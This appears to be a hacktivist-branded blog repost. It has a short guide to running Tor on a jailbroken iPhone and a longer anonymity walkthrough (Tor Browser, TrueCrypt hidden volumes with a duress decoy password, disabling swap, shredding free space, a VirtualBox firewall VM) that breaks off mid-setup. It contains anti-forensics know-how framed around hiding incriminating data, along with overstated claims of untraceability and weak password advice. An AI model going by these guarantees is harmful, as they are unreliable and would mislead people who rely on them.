☠ SHARE ☠ SHARE ☠ SHARE ☠ SHARE

☠ SHARE NO©

- #anonymous
- #Anon
- #anonymiss
- #antiacta
- #antisec
- #anonfamily
- #antiSOPA
- #antipipa
- #ANTIACTA
- #NO-ACTA
- #wearelegion
- #expectus
- #democracy
- #freeweb
- #free
- #freedom
- #fight
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #LuLzWar
- #lulztime
- #LulzWarfare
- #lulz
- #windows
- #GodMode
- #interwebz
- #insurgency
- #insurgent
1 year ago
Permalink

View Separately

How To Install Tor On Apple Mobile Devices

By #Anonymous Productions NO©™

Step 1: jailbreak your device. Use either JailbreakMe or PwnageTool / Red Sn0w. If you don’t know which method to use, take a look at Jailbreak.Me for detailed informations.

Step 2: On your device, you now need to create the folder

/var/root/Media/Cydia/AutoInstall

and copy this deb into it. Take a look at the official Copying Files to/from Device instructions if you do not know how to do so.

If you want to install packages using the old command line method, instructions are here.

Remember: if you ever choose to enable SSH access, you have to change default passwords!

Step 3: Reboot your device.

Step 4: Open Cydia, refresh your sources and do an upgrade, to have all packages up to date.

Step 5: Install Tor Toggle.

Step 6: Add Tor to SBSettings menu.

Step 7: Toggle it!

Step 8: Configure your wireless network settings for Tor usage, go to:

Settings -> WiFi -> Your Wireless Network ESSID -> HTTP Proxy Manual

and set these parameter:

Server: 127.0.0.1
Port: 8118
Authentication: OFF

iOS SHOULD transparently proxying any traffic through the Tor network now. Be aware that many applications (like Mobile Mail) still leaks, though.

For any problems or suggestions, just drop me a mail.

“I disapprove of what you say, but I will defend to the death your right to say it.” - Evelyn Beatrice Hall

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare..

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE

- #antipipa
- #antiSOPA
- #antiacta
- #anonfamily
- #anonymous
- #Anon
- #anonymiss
- #antisec
- #democracy
- #freeweb
- #free
- #freedom
- #fight
- #H4ck3rz
- #hacker
- #hacking
- #hacktivist
- #interwebz
- #insurgency
- #insurgent
- #LuLzWar
- #lulztime
- #LulzWarfare
- #lulz
- #privacy
- #REVOLUTION
- #rebel
- #rebelion
- #TOR
- #Anonimity
1 year ago
Permalink

View Separately

By #Anonymous Productions NO©™
How to secure your computer and surf fully anonymous BLACK-HAT STYLE

This is a guide with which even a total noob can get high class security for his system and complete anonymity online. But it’s not only for noobs, it contains a lot of tips most people will find pretty helpful. It is explained so detailed even the biggest noobs can do it^^:

== The Ultimate Guide for Anonymous and Secure Internet Usage v1.0.1 ==

Table of Contents:

1. Obtaining Tor Browser
2. Using and Testing Tor Browser for the first time
3. Securing Your Hard Drive
4. Setting up TrueCrypt, Encrypted Hidden Volumes
5. Testing TrueCrypt Volumes
6. Securing your Hard Disk
7. Temporarily Securing Your Disk, Shredding Free Space
8. Installing VirtualBox
9. Installing a Firewall
10. Firewall Configuration
11. Installing Ubuntu
12. Ubuntu Initial Setup
13. Installing Guest Additions
14. Installing IRC (Optional)
15. Installing Torchat (Optional)
16. Creating TOR-Only Internet Environment
17. General Daily Usage

By the time you are finished reading and implementing this guide, you will be able to securely and anonymously browse any website and to do so anonymously. No one not even your ISP or a government agent will be able to see what you are doing online. If privacy and anonymity is important to you, then you owe it to yourself to follow the instructions that are presented here.

In order to prepare this guide for you, I have used a computer that is running Windows Vista. This guide will work equally well for other versions of Windows. If you use a different operating system, you may need to have someone fluent in that operating system guide you through this process. However, most parts of the process are easily duplicated in other
operating systems.

I have written this guide to be as newbie friendly as possible. Every step is fully detailed and explained. I have tried to keep instructions explicit as possible. This way, so long as you patiently follow each step, you will be just fine.

In this guide from time to time you will be instructed to go to certain URLs to download files. You do NOT need TOR to get these files, and using TOR (while possible) will make these downloads very slow.

This guide may appear overwhelming. Every single step is explained thoroughly and it is just a matter of following along until you are done. Once you are finished, you will have a very secure setup and it will be well worth the effort. Even though the guide appears huge, this whole process should take at the most a few hours. You can finish it in phases over
the course of several days.

It is highly recommended that you close *ALL* applications running on your computer before starting.

=== 1 : Obtaining Tor Browser ===

The first step to becoming secure and anonymous online is to setup and install something called “TOR”. “TOR” is short for “The Onion Router”. The concepts behind TOR were first implemented by the United States Military, and these principles have been used to create an extremely secure mechanism for being anonymous online. In fact, millions of people world-wide use TOR to browse the internet and communicate anonymously.

TOR works by heavily encrypting your communications so that no observer can see what website you are really going to, and what information is really being sent. It all appears as a bunch of random characters to any observer. You simply use the TOR web browser just as you use any other web browser. TOR takes care of the rest.

However, TOR by itself is not enough. Even when using TOR, a user can be compromised in a number of ways. First, some websites can be set up to attempt to reveal someone’s true IP address (their true identity) by tricking their web browser or other software to transmitting that information. For this reason, anyone who uses TOR will recommend that no one have JavaScript or flash turned on while browsing TOR. In this guide however, I will show you a much better solution.

The second issue is that of human error. Even if you have TOR installed, you may accidentally forget which browser to put in a link. You may also accidentally click on a link from another program, such as a chat program. That program might then load the link you clicked on into a non-TOR browser. When you are using TOR, you must be careful *constantly* that every link goes into the right browser, and that you do not accidentally click the wrong link.

So then, let’s begin. Obtaining the TOR Browser is easy. Simply go to the following website:

http://www.torproject.org

Once here, you may feel free to read more about what TOR is and how it works, or you may proceed to immediately download TOR.

Here is how to do so:

1. Click on “Download TOR”, or “Download”.

2. You will see text that says, “The Tor Browser Bundle contains everything you ned … Just extract it and run. Learn more »

3. Click on this “Learn more” link. For the “Tor Browser Bundle”

4. Assuming you are an English speaker, you would choose the top-most link “English (en-US)”. Otherwise, pick the language best suited to you.

5. The file being saved will be named: tor-browser-2.2.35-4_en-US.exe

It is ok if the number is not exactly 2.2.35-4, there are new versions of Tor from time to time. At the time that this guide was written, 2.2.35-4 was most current. By the time you are reading this, a more current version of TOR may exist.

6. Run this file.

7. You will be prompted to extract this to a directory. By default, it will be set to C:Users\You\Downloads This is perfectly ok. You can also choose a different directory if you wish.

8. Click “Extract”

That’s it. TOR Browser is NOW installed. Time to test it out!

=== 2 : Using and Testing Tor Browser for the first time ===

Now you have successfully downloaded and installed the Tor Web Browser Bundle. You are no doubt anxious to begin using it. First, click on the “start” menu icon, the icon in the lower left of your screen with the windows logo. On the top right will be a listing that says “You”, “Documents”, “Pictures”, “Music”… “You” of course will be replaced by your user name. Click on “You”, the top most link. This will open up your main user folder.

Now, locate the folder called “Downloads” and double click on it.

Now, inside the “Downloads” folder, double click on the folder called “Tor Browser”.

Lastly, double click on the application: “Start Tor Browser”

When you do, you will see the Vidalia Control Panel appear, and you will observe as you connect to the TOR network. When this is complete, your web browser will open up and will automatically connect to the web address: check.torproject.org

This is to confirm that you are in fact using TOR. If you have followed this guide correctly, then you will see the following green text, or something similar:

“Congratulations. Your browser is configured to use Tor.”

Now you can use this web browser the same as any other. You can go to any website you wish, and neither your ISP nor anyone else will be able to see where you are going, or what you are doing. However, there are still issues that need to be resolved, so don’t begin browsing just yet.

*************************************
******* IMPORTANT SAFETY NOTE ********
*************************************
If you fill out a form containing your email address, your name, or any other sensitive information while using the TOR browser, be aware that sometimes it is possible for an observer to see that information. When using TOR, use it to access websites and content that you are *not* connected to via your real identity or any username or nick name which links to your real identity. Let TOR be for anonymous browsing solely. Do your online banking, or any other activities involving your real identity using your normal web browser.
************************************

=== 3 : Securing Your Hard Drive ===

Being able to browse anonymously is one thing. However, you may choose to download and save sensitive content or material to your computer which you wish to keep private. This may include reading sensitive documents, viewing pictures, or storing any kind of sensitive data.

If you save *anything* to your computer’s harddrive, then it is possible for someone who has confiscated your computer to determine what it was you saved. This is often true even if you delete the content. For example, suppose I use the Tor Browser and I navigate to a website containing a sensitive document that I wish to read. If I saved that document somewhere on my hard drive, then it is possible for someone else to find it. If I *delete* that document, it may still be possible for someone to undelete it.

Further, even if I never save it to my harddrive but I simply look at it using my word processing software, it may still be saved in a number of ways including:

1. Often programs keep records of filenames. The filename alone is often enough to incriminate someone.
2. Often programs keep parts of the content viewed saved for various reasons, such as for searching. This can include random excerpts of text, thumbnails of images, and more. Often this “partial” data is more than enough to prove what the original data was. Often the “partial” data is itself incriminating.
3. Sometimes, especially if you are running low on system memory, your operating system may choose to use your hard-disk as a temporary RAM. This is known as “SWAP”. Normally, whenever you turn off your computer, whatever was in RAM is deleted. However, the data that goes to your SWAP may persist and it may be possible for someone to see what content you had open in your programs if that information is saved in RAM.

Generally speaking, you *must* have a plan to secure any content that is saved to your hard disk. Therefore, this guide would be incomplete if we did not thoroughly address this. First, there are two kinds of such content:

1. Deliberately saved content.
2. Inadvertently saved content.

Deliberately saved content refers to content that you have chosen to save on your harddisk so that you can access this content later. We will address how to do this later in the guide.

Inadvertently saved content refers to content that is saved by programs you use, or your operating system. You have no way to even know what this content might be. Therefore, this is the most dangerous. You may browse and find a dozen sensitive documents, utterly delete them, and some program may have saved the file names and excerpts of the data. This will render your previous efforts futile.

Content that is inadvertently saved to your harddisk comes in two flavors:

1. Content that is saved to your SWAP space.
2. Content that is saved by applications running on your computer, including your operating system.

The surest way to prevent content from writing to your SWAP space is to disable your SWAP space altogether. This may result in your computer running a bit slower than normal, and may mean that you cannot use ram intensive games and applications during the time your SWAP is disabled.

Therefore, if you use this method, simply turn back on the SWAP when you want to use those ram intensive applications. Also, you may choose not to take this step.

1 - Here is how to disable your swap space if you are using Windows 7:

*** ADVANCED INSTRUCTIONS BELOW. SKIP THIS IF YOU ARE NOVICE OR UNCOMFORTABLE WITH THIS OPERATION ***

*This step is recommended for advanced users only. If you are not comfortable doing this, you may safely skip this step.*

Instructions are less verbose than usual, as these steps are intended for advanced users only. If you do not fully understand these instructions, skip this step.

1. From Control Panel, go to “System and Security”.
2. Click on “System”, and then choose “Advanced system settings” in the left-most menu.
3. Under the “Advanced” tab, under “Performance”, click “Settings”.
4. Under this “Advanced” tab, under “Virtual Memory”, click “Change”
5. Uncheck “Automatically manage paging file sizes for all drives”
6. Select “No paging file”
7. Save, reboot, and follow these same first 5 steps to confirm that “No paging file” is still selected. This means that you have successfully disabled your swap. This means that *nothing* from RAM will be inadvertently saved to your harddrive.

To resume using SWAP again, simply click “Automatically manage paging file size for all drives.” You can switch between these two modes as you desire.

Generally speaking, your computer will run fine without a swap file, provided you have enough RAM.

*** END OF ADVANCED INSTRUCTIONS ***

The next issue we need to address is how to prevent applications and/or your operating system from saving content inadvertently that you do not want saved. For this, we are going to set up a “Virtual Machine”.

A “Virtual Machine” is like a computer inside of your computer. Everything you do inside the Virtual Machine (vm for short) will be fully contained within itself and no one will be able to see what the vm has been doing. Ideally, you want *ALL* of your sensitive computer usage of any kind, TOR or NON TOR, to take place within a vm. In this way, you can keep everything private that you wish while still using your computer fully and getting the most out of it.

Don’t be afraid of this sounds complicated. This guide will take you through every step slowly and methodically. Before we can set up a vm however, we need to take another step.

=== 4 : Setting up TrueCrypt, Encrypted Hidden Volumes ===

If you save anything on your computer, it is likely that you do not want just anyone to be able to see what you have saved. You want a way to protect that information so that you can access it, and absolutely no one else except those you trust. Therefore, it makes sense to set up a system which protects your information and safeguards it against prying eyes.

The best such system for this is called “True Crypt”. “True Crypt” is an encryption software program which allows you to store many files and directories inside of a single file on your harddrive. Further, this file is encrypted and no one can actually see what you have saved there unless they know your password.

This sounds extremely high tech, but it is actually very easy to set up. We are going to do so, right now:

1. Go to http://www.truecrypt.org/downloads (or go to http://www.truecrypt.org/ and click on “Downloads”)
2. Under “Latest Stable Version”, under “Windows 7/Vista/XP/2000”, click “Download”
3. The file will be called “True Crypt Setup 7.1.exe” or something similar. Run this file.
4. If prompted that a program needs your permission to continue, click “Continue”.
5. Check “I accept and agree to be bound by these license terms”
6. Click “Accept”
7. Ensure that “Install” is selected, and click “Next”
8. Click “Install”
9. You will see a dialog stating “TrueCrypt has been successfully installed.” Click “Ok”
10. Click “No” when asked if you wish to view the tutorial/user’s guide.
11. Click “Finish”

At this point, TrueCrypt is now installed. Now we will set up truecrypt so that we can begin using it to store sensitive information.

1. Click the “Windows Logo”/”Start” button on the lower left corner of your screen.
2. Click “All Programs”
3. Click “TrueCrypt”
4. Click the “TrueCrypt” application

And now we can begin:

1. click the button “Create Volume”
2. Ensuring that “Create an encrypted file container” is selected, click “Next”
3. Select “Hidden TrueCrypt volume” and click “Next”.
4. Ensuring that “Normal mode” is selected, click “Next”
5. Click on “Select File”

Note which directory you are in on your computer. Look at the top of the dialog that has opened and you will see the path you are in, most likely the home directory for your username. An input box is provided with a flashing cursor asking you to type in a file name. Here, you will type in the following filename:

random.txt

You may of course replace random.txt with anything you like. This file is going to be created and will be used to store many other files inside. Do NOT use a filename for a file that already exists. The idea here is that you are creating an entirely new file.

It is also recommended though not required that you “hide” this file somewhere less obvious. If it is in your home directory, then someone who has access to your computer may find it easier. You can also choose to put this file on any other media; it doesn’t have to be your hard disk. You could for example save your truecrypt file to a usb flash drive, an sd card, or some other media. It is up to you.

6. Once you have typed in the file name, click “Save”
7. Make sure “Never save history” is checked.
8. Click “Next”
9. On the “Outer Volume” screen, click “Next” again.
10. The default Encryption Algorithm and Hash Algorithm are fine. Click “Next”
11. Choose a file size.

In order to benefit the most from this guide, you should have at least 10 gigabytes of free disk space. If not, then it is worth it for you to purchase some form of media (such as a removable harddrive, a large sd card, etc.) in order to proceed. TrueCrypt can be used on all forms of digital media not just your hard disk. If you choose to proceed without obtaining at least ten gigabytes of disk space, then select a size that you are comfortable with (such as 100 MB).

Ideally, you want to choose enough space to work with. I recommend 20 GB at least. Remember that if you do need more space later, you can always create additional TrueCrypt volumes using exactly these same steps.

12. Now you are prompted for a password. THIS IS VERY IMPORTANT. READ THIS CAREFULLY

*** READ THIS SECTION CAREFULLY ***

*** The password you choose here is a decoy password. That means, this is the password you would give to someone under duress. Suppose that someone suspects that you were accessing sensitive information and they threaten to beat you or worse if you do not reveal the password. THIS is the password that you give to them. When you give someone this password, it will be nearly impossible for them to prove that it is not the RIGHT password. Further, they cannot even know that there is a second password. ***

Here are some tips for your password:

A. Choose a password you will NEVER forget. It may be ten years from now that you need it. Make it simple, like your birthday repeated three times.
B. Make sure it seems reasonable, that it appears to be a real password. If the password is something stupid like “123” then they may not believe you.
C. Remember that this is a password that you would give to someone if forced. It is *NOT* your actual password.
D. Do not make this password too similar to what you plan to really use. You do not want someone to guess your main password from this one.

And with all of this in mind, choose your password. When you have typed it in twice, click “Next”.

13. “Large Files”, here you are asked whether or not you plan to store files larger than 4 GIGABYTES. Choose “No” and click “Next”
14. “Outer Volume Format”, here you will notice some random numbers and letters next to where it says “Random Pool”. Go ahead and move your mouse around for a bit. This will increase the randomness and give you better encryption. After about ten seconds of this, click “Format”.
15. Depending on the file size you selected, it will take some time to finish formatting.

“What is happening?”

TrueCrypt is creating the file you asked it to, such as “random.txt”. It is building a file system contained entirely within that one file. This file system can be used to store files, directories, and more. Further, it is encrypting this file system in such a way that without the right password it will be impossible for anyone to access it. To *anyone* other than you, this file will appear to be just a mess of random characters. No one will even know that it is a truecrypt volume.

16. “Outer Volume Contents”, click on the button called, “Open Outer Volume”

An empty folder has opened up. This is empty because you have yet to put any files into your truecrypt volume.

*** *** DO NOT PUT ANY SENSITIVE CONTENT HERE *** ***

This is the “Decoy”. This is what someone would see if you gave them the password you used in the previous step. This is NOT where you are going to store your sensitive data. If you have been forced into a situation where you had to reveal your password to some individual, then that individual will see whatever is in this folder. You need to have data in this folder that appears to be sensitive enough to be protected by truecrypt in order to fool them. Here are some important tips to keep in mind:

A. Do NOT use porn. Adult models can sometimes appear to be underage, and this can cause you to incriminate yourself unintentionally.
B. Do NOT use drawings/renderings/writings of porn. In many jurisdictions, these are just as illegal as photographs.
C. Good choices for what to put here include: backups of documents, emails, financial documents, etc.
D. Once you have placed files into this folder, *NEVER* place any more files in the future. Doing so may damage your hidden content.

Generally, you want to store innocent data where some individual looking at it would find no cause against you, and yet at the same time they would understand why you used TrueCrypt to secure that data.

Now, go ahead and find files and store them in this folder. Be sure that you leave at least ten gigabytes free. The more the better.

When you are all done copying files into this folder, close the folder by clicking the “x” in the top right corner.

17. click “Next”

18. If prompted that “A program needs your permission to continue”, click “Continue”
19. “Hidden Volume”, click “Next”
20. The default encryption and hash algorithms are fine, click “Next”
21. “Hidden Volume Size”, the maximum available space is indicated in bold below the text box. Round down to the nearest full unit. For example, if 19.97 GB is available, select 19 GB. If 12.0 GB are available, select 11 GB.
22. If a warning dialog comes up, asking “Are you sure you wish to continue”, select “Yes”
23. “Hidden Volume Password”

*** IMPORTANT READ THIS ***

Here you are going to select the REAL password. This is the password you will NEVER reveal to ANYONE else under any circumstances. Only you will know it. No one will be able to figure it out or even know that there is a second password. Be aware that an individual intent on obtaining your sensitive information may lie to you and claim to be able to figure this out. They cannot.

It is HIGHLY recommended that you choose a 64 character password here. If it is difficult to remember a 64 character password, choose an 8 character password and simply repeat it 8 times. A date naturally has exactly 8 numbers, and a significant date in your life repeated 8 times would do just fine.

24. Type in your password twice, and click “Next”
25. “Large Files”, select “Yes” and click “Next”.
26. “Hidden Volume Format”, as before move your mouse around for about ten seconds randomly, and tehn click “Format”.
27. If prompted “A program needs your permission to continue”, select “Continue”
28. A dialog will come up telling you that the hidden TrueCrypt volume has been successfully created. Click “Ok”
29. Click “Exit”

Congratulations! You have just set up an encrypted file container on your hard drive. Anything you store here will be inaccessible to anyone except you. Further, you have protected this content with TWO passwords. One that you will give to someone under threat, and one that only you will know. Keep your real password well protected and never write it down or give it to anyone else for any reason.

Now, we should test BOTH passwords.

=== 5. Testing TrueCrypt Volumes ===

Once you have completed the above section, you will be back at TrueCrypt. Go ahead and follow these steps to test the volumes you have made.

1. Click “Select File…”
2. Locate the file you created in the last section, most likely called “random.txt” or something similar. Remember that even though there is both an outer and a hidden volume, both volumes are contained in a single file. There are not two files, only one.
3. Click “Open”
4. Choose a drive letter that you are not using (anything past M is probably just fine). Click on that, for example click on “O:” to highlight it.
5. Click “Mount”
6. Now you are prompted for a password. Read the below carefully:

The password you provide here will determine WHICH volume is mounted to the drive letter you specified. If you type in your decoy password, then O: will show all the files and directories you copied that you would reveal if forced. If you type in your real password, then O: will show the files and directories that you never intend anyone to see.

7. After successfully typing in your password, you will see additional detail to the right of the drive letter, including the full path to the file you selected as well as the kind of volume it is (for example, hidden).
8. Right click on your “Windows Logo”/”Start Menu” icon, and scroll down to the bottom where you can see your different drive letters. You will see the drive letter you selected, for example: “Local Disk (O:)”. Click on that.
9. If you selected your decoy password, you will see all the files and folders that you moved there during the installation phase. If you selected the real password, you will see whatever files and directories you have placed so far into the hidden volume, if any.

If you selected your hidden volume password, you may now begin moving any sensitive information you wish. Be aware that simply moving it from your main hard disk is not enough. We will discuss how to ensure deleted data is actually deleted later in the guide.

“What is happening?”

When you select a file and mount it to a drive, you are telling your computer that you have a new drive with files and folders on it. It is the same thing as if you had plugged in a usb flash drive, a removable harddrive, or an sd card into your computer. TrueCrypt causes your computer to think that there is an entirely new disk drive on your computer. You can use this disk drive just as if it *was* actually a usb flash drive. You can copy files to it, directories, and use it just as you would use a usb flash drive.

When you are done, simply close all open windows/folders/applications that are using your truecrypt drive letter, and then click “Dismount” from within TrueCrypt while you have the drive letter highlighted. This will once again hide all of this data, accessible only by re-mounting it with the correct password.

*** VERY IMPORTANT SAFETY INFORMATION ***

When a true crypt hidden volume is mounted, someone who has access to your computer can access anything that is inside that hidden volume. If for example you left your computer running while a truecrypt volume was mounted, then if someone gained access to your computer they would be able to see everything you have in that volume. Therefore:

*** ALWAYS REMEMBER TO DISMOUNT ANY TRUECRYPT VOLUME CONTAINING ANY SENSITIVE INFORMATION WHEN YOU ARE NOT USING YOUR COMPUTER ***

You can tell that it is dismounted because the drive letter inside of “TrueCrypt“‘s control panel will appear the same as all of the other drive letters, with no information to the right of the drive letter.

You should practice Mounting and Dismounting a few times with both passwords to make sure you understand this process.

Once you have copied files/folders into the hidden volume, do *NOT* touch the files or folders in the outer volume anymore. Remember that both volumes occupy the same single file, and therefore changing the outer volume can damage the hidden volume. Once you have copied files/folders into the outer volume during the installation process that is the last time you should do so. From that point forward, use ONLY the hidden volume. The outer volume exists only as a decoy if you need it.

=== 6. Securing your Disk ===

This is an involved step which many people may not be able to do right away. If you cannot do this step immediately, then see section 7.

At this point you should understand how to create and use TrueCrypt hidden volumes in order to safeguard any sensitive information. Therefore, you should *NOT* keep any such sensitive information on your hard disk. At this stage, there are two possibilities:

1. You have never had any sensitive information on your hard disk. In this case, read this section but you can certainly skip it.
2. Up until now, you have stored sensitive information on your hard disk. If so, then you MUST read this section.

If you have ever used this computer to access sensitive information, then all of the security and precautions in the world are totally useless and futile because all someone has to do is access what is left of that sensitive information. I cannot stress this enough.

You can have the most secure TrueCrypt volumes, use TOR, and be the safest most secure user in the world. If you have not made sure that *ALL* remnants of any sensitive information are UTTERLY REMOVED from your hard disk, then all of that effort is totally pointless. You MUST take these actions to safeguard your hard disk, or otherwise you might as well throw away this guide and follow none of the advice herein.

First, I understand that it is troublesome to have to re-format a computer, to back everything up, and reinstall everything. However, if you have ever had sensitive information on your machine, which is what you, have to do. Take the following steps:

1. Obtain a removable harddrive or usb flash drive large enough to store anything you need to save.
2. Set up a truecrypt hidden volume on that harddrive big enough to hold all of that information.
3. Set up the truecrypt outer volume as in the previous section. Use the previous section as a guide if you need to.
4. Be sure you the hidden volume will have enough space to store all that you are backing up.
5. Copy ALL data you need to back up/save into that hidden volume.

*** IMPORTANT, READ THIS ***

If you have ever used this system to access sensitive information, then you must assume that the sensitive information or remnants of it can be *anywhere* on your hard disk. Therefore, you need to move *EVERYTHING* you intend to save into the hidden truecrypt container. You do not know where sensitive data might be, so you are assuming it can be anywhere. This way you still have ALL of your data and you have lost nothing.

A good analogy is toxic waste. You don’t know which barrel might contain the toxic waste, so you treat *ALL* the barrels as potentially toxic. This is the surest way you can protect yourself.

You might be saying, “I have family photos, music, movies that I would have to move to the hidden volume.” That is perfectly fine. Remember that you can access that hidden volume just as if it was a drive letter. In fact, ideally, *ALL* of the content on your computer (assuming you value your privacy) should be protected anyways. You lose nothing by securing all of that data.

6. Once you have copied everything you intend to copy. Dismount your hidden volume, reboot your computer, and re-mount your hidden volume to make sure everything is there.
7. Now it is time to re-format your entire hard drive. Re-install your operating system of choice (such as Windows 7), and start with a clean slate.
8. Once you have reinstalled your operating system from scratch, follow sections one through five of this guide to reach this point, and then proceed.

=== 7. Temporarily Securing Your Disk, Shredding Free Space ===

Like the previous section, this section applies ONLY IF there is some risk that sensitive data has ever been stored or accessed on this computer. If you are 100% sure that sensitive information has never been accessed using this computer, then you can safely skip this and the previous step.

If you are not prepared to take the actions in the previous step yet, then you should follow the steps in this section until you can. However, you MUST eventually take the actions in step six above. Do not assume you can find/delete all sensitive content. Lists of filenames, image thumbnails, random data, and more *ARE* sitting on your hard disk. Someone who knows how to find it, WILL. That will render all of your other precautions totally futile.

As soon as you can, follow the instructions in step six.

Meanwhile, here is how you can temporarily safeguard yourself until you are able to follow those instructions.

1. Go through your hard disk folder by folder, deleting (or moving to a truecrypt hidden volume) any files that you believe are sensitive/risky.
2. When you are totally sure that you have deleted all such files, go to the following URL: http://www.fileshredder.org
3. Scroll down and look for the button called “Download File Shredder” — do NOT click any other button, as the page may have ads on it that appear to be download links.
4. Save the file.
5. Run the file, most likely titled: file_shredder_setup.exe
6. “Welcome to the File Shredder Setup Wizard”, Click “Next”
7. Select “I accept the agreement” and click “Next”
8. It will choose where to install it, click “Next”
9. Click “Next” again when prompted for the Start Menu folder.
10. “Select Additional Tasks”, Click “Next” again
11. Click “Install”
12. Ensuring that “Launch File Shredder” is checked, click “Finish”
13. You should now notice that “File Shredder” is running. You should see the program in your task bar. Click on it to bring up the control panel if it is not up already.
14. On the left is a link that says “Shred Free Disk Space”, click it.
15. Choose the drive letter for your hard disk, typically C:, as well as any other drives you wish to shred the free space.
16. Under “Select Secure Algorithm”, select “Secure Erasing Algorithm with 7 passes” and click “Next”
17. Click “Start”

This will take some time to finish. Once you have finished shredding your free disk space, it will be impossible or nearly impossible for someone to find one of your deleted files and piece it back together to see what it once was. However, this is NOT enough.

Keep in mind that there may still be records of the filenames that were deleted, partial data from those files, image thumbnails, and more that may be enough to incriminate you. This is only a temporary step you have taken, and you absolutely must take the actions in step 6 above in order to be truly safe.

=== 8. Installing VirtualBox ===

And now we get to the fun part. We are going to create a secure environment for you to browse the internet and communicate in a way that is totally anonymous and untraceable. You will have a setup that is so secure as to be virtually impossible to break.

1. First, go to the following URL: http://www.virtualbox.org
2. Select “Downloads” in the menu on the left
3. Under “VirtualBox platform packages” is “VirtualBox 4.1.8 for Windows Hosts”, next to that is “x86/amd64”. Click that.
4. Save the file. It should be titled similar to: “VirtualBox-4.1.8 -75467-Win.exe”
5. Run the file.
6. “Welcome to the Oracle VM… Setup Wizard”, Click “Next”.
7. Click “Next”
8. Click “Next”
9. “Warning: Network Interfaces”, click “Yes” but be aware that your internet connection will be temporarily reset for a few seconds.
10. Click “Install”
11. A dialog saying “A program needs your permission to continue” may appear, click “Continue”.
12. One or more dialogs asking if you want to install “device software” may come up, select “Install” each time.
13. Optionally check the box “Always trust software from Oracle Corporation.”
14. “Oracle VM… installation is complete”, Click “Finish” ensuring that “Start Oracle VM after installation” is checked.

Now we have the software we need in order to set up and run virtual machines. On your task bar to the far right, you should notice VirtualBox running. Click on the “VirtualBox” icon if needed in order to bring the VirtualBox control panel into view.

Now it is time to set up a virtual machine. For this, we need to obtain two files. Operating systems, such as windows, are typically installed using a cd or dvd. You put the cd or dvd into your computer, you boot it up, and you follow the instructions in order to install the operating system. Virtual machines work similarly. Before we can use a virtual machine, we have to install an operating system on it.

However, we are *NOT* going to use Windows! We are going to use Linux. Do not be afraid if you have no experience using Linux. I assure you that this will prove to be painless. We actually need two different linux operating systems in order to have a secure system. Before we go through the steps of setting this up, I want to describe to you what we are doing.

Remember earlier in the guide I explained that one of the downsides to using Tor Browser from your main computer is that you might accidentally put a link into a non-Tor browser. The problem with your computer right now is that you can access tor sites, or non-tor sites equally well. That means that you have to be extremely careful to ensure that you are using Tor.

An analogy would be to say that you are typing on a keyboard with red and green keys. You have to be careful to only hit the green keys. If you accidentally hit a red key, then you could compromise your security and anonymity. That is *not* a good position to be in. The purpose of setting up a virtual machine is to make certain that you cannot accidentally reveal your identity or compromise your security.

The computer you are using now has two ways of accessing the internet: TOR, and Non-TOR. The virtual machine we are setting up however will only be able to access the internet using TOR. No other way period. That means that no matter what you do, no matter how hard you try, you will NOT be able to accidentally access any website except through TOR. This *guarantees* that whatever you do on that virtual machine is going to be through TOR.

So how do we achieve this? There are a number of ways to do so. The method presented in this guide is not the only good way, however I do believe that it is both easy to set up and also friendly to users who may not have a great deal of RAM.

First, we are going to set up two different virtual machines. One of them will exist for the sole purpose of making sure that the other one does not accidentally connect to the internet except through TOR. This virtual machine requires very little. You will not be using it for anything. It will simply act as a gatekeeper to ensure that the other Virtual Machine is safe.

The second virtual machine will be what you use for internet browsing, chatting, etc. This virtual machine will be configured in such a way that it can only use TOR and nothing else. The way we will achieve this is to force this second virtual machine to go through the first virtual machine for all internet connections.

Do not worry if this seems complicated. As with the rest of this guide, I am going to walk you through step by step exactly what to do.

First, we have to obtain the operating systems we will need. In this case, we are going to use “Damn Small Linux” (yes that is its real name) for the firewall and we are going to use “Ubuntu” for the main system. The advantage to using “Damn Small Linux” is that we only need 32 MB of ram and no disk space to have an effective firewall.

Let’s set up the firewall first:

=== 9. Installing a Firewall ===

1. First, go to the following URL: http://www.damnsmalllinux.org (three l’s)
2. Scroll down until you see a link that says “Download”
3. Under “Current Full Mirror List”, click any that work. Some may not work at any given time. If one doesn’t work, simply hit back on your browser and try another one.
4. At the time of this guide, the following url worked: ftp://ftp.is.co.za/linux/distributions/damnsmall/current/
5. Go to the “current” directory if not already in it.
6. Click on the file called: dsl-4.4.10.iso — If you cannot find this file, choose the file closet to it. A higher version number is fine. The file will probably be about 50 MB
ftp://ftp.is.co.za/linux/distributions/damnsmall/current/dsl-4.4.10.iso
7. The file should take about 5-10 minutes to download based on your connection.

(IF THE ABOVE STEPS WORKED FOR YOU, SKIP THIS MINI-SECTION)
(Above I have already provided instructions for the mirror ftp://ftp.is.co.za)

(If you had trouble with the above steps, read this mini-section)
With mirrors, it is often the case that a particular mirror site doesn’t work. At the time of this writing, several mirrors worked. I am providing detailed instructions for each mirror.

Now MIRROR: http://gd.tuwien.ac.at/opsys/linux/damnsmall
Go to this URL, and under “Subdirectories” click on “current” if available, select the file called “current.iso” (provided the file is at least 49 MB in size If not, then choose the closest file to dsl-4.4.10.iso, a higher version # is fine.

Now MIRROR: http://ftp.belnet.be/packages/damnsmalllinux/
Go to “current” directory, obtain either “current.iso” (if 49 MB or higher) or find file closest to “dsl-4.4.10.iso” a higher version # is fine.

Now MIRROR: http://ftp.heanet.ie/mirrors/damnsmalllinux.org/
Go to “current” directory, obtain either “current.iso” (if 49 MB or higher) or find file closest to “dsl-4.4.10.iso” a higher version # is fine.

At this point, you should have the file either “current.iso” or “dsl-4.4.10.iso” (or something similar) fully downloaded and saved into your Downloads directory.

Now, go ahead and open up VirtualBox again, most likely by clicking it on the task bar.

8. Click “New” at the top left, an icon that resembles a many-pointed round star.
9. “Welcome to the New Virtual Machine Wizard”, click “Next”
10. “VM Name and OS Type”: Under “Name” type in: Firewall
11. For Operating System, choose “Linux”
12. For “Version”, choose: “Other Linux”
13. Click “Next”
14. “Memory”, select “32 MB” and click Next
